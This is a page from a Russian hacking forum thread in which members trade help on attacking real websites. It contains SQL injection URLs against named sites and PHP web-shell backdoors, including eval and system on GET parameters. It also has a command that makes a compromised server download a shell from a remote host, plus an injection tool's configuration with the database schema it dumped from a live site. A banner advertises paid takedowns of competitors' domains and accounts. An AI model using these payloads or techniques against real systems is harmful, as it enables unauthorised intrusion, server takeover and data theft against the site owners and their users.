Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1275 из 1393

1275

Опции темы

Поиск в этой теме

Опции просмотра

#12741

25.04.2010, 21:09

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

Отправить сообщение для LokbatanLi с помощью ICQ

http://www.oragir.am/news.php?id=-13%27a

tut sql ??

#12742

25.04.2010, 21:14

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

нет

#12743

25.04.2010, 21:44

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

Цитата:

Сообщение от LokbatanLi

esli tebya mysql version() toqda..
http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_con st(version(),1),name_const(version(),1))a)

нет версию и дбнайм я сам смогу взят но кто нит подскажите как далше вывести имена таблиц и колонок

#12744

25.04.2010, 21:49

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Залил через скуль конструкцию вида <?system ($_GET ['cmd']);?> , сервер работает под виндой, wget и curl не катят, как можно залить полноценный шелл?

Последний раз редактировалось Redwood; 25.04.2010 в 22:01..

#12745

25.04.2010, 22:05

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

Сообщение от Redwood

льешь <?php eval(stripslashes($_GET[id])); ?>

http://site.ru/shell.php?id=copy('http://google.ru/shell.php','/куда/лить/shell.php');

#12746

25.04.2010, 23:08

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

Пипл, подскажите, есть доступ к phpMyAdmin. Как залить полноценный шел?

#12747

25.04.2010, 23:11

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от GOGA075

Пипл, подскажите, есть доступ к phpMyAdmin. Как залить полноценный шел?

http://forum.antichat.ru/showthread.php?p=1000812

#12748

25.04.2010, 23:17

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

Konqi, а это разве полноценный шел получиться??

#12749

25.04.2010, 23:26

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от GOGA075

Konqi, а это разве полноценный шел получиться??

http://forum.antichat.ru/showthread.php?t=43015
http://defeated.ru/showthread.php?p=9987

#12750

26.04.2010, 00:46

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от DrakonHaSh

а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось

Код:

$method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "information_schema.tables"; # 
$f_url = "http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+&cat=exploits"; # close SQL

-----------------------------------------
System information:
-----------------------------------------
base:hack0wn
basedir:/usr/
datadir:/var/lib/mysql/
os:redhat-linux-gnu
tmpdir:/tmp/
ver:5.0.86-log
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
ROUTINES
VIEWS
SCHEMA_PRIVILEGES
advisories
SCHEMATA
bins
PROFILING
exploits
KEY_COLUMN_USAGE
comments
COLLATIONS
TABLE_CONSTRAINTS
profiles
COLUMN_PRIVILEGES
TABLE_PRIVILEGES
shellcodes
COLUMNS
TRIGGERS
sources
CHARACTER_SETS
TABLES
papers
COLLATION_CHARACTER_SET_APPLICABILITY
USER_PRIVILEGES
videos
STATISTICS
misc

Цитата:

Сообщение от auth_root

Pashkela
Это чем?

https://forum.antichat.net/thread148915-toolza.html

Последний раз редактировалось Pashkela; 26.04.2010 в 02:44..

Страница 1275 из 1393

1275

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход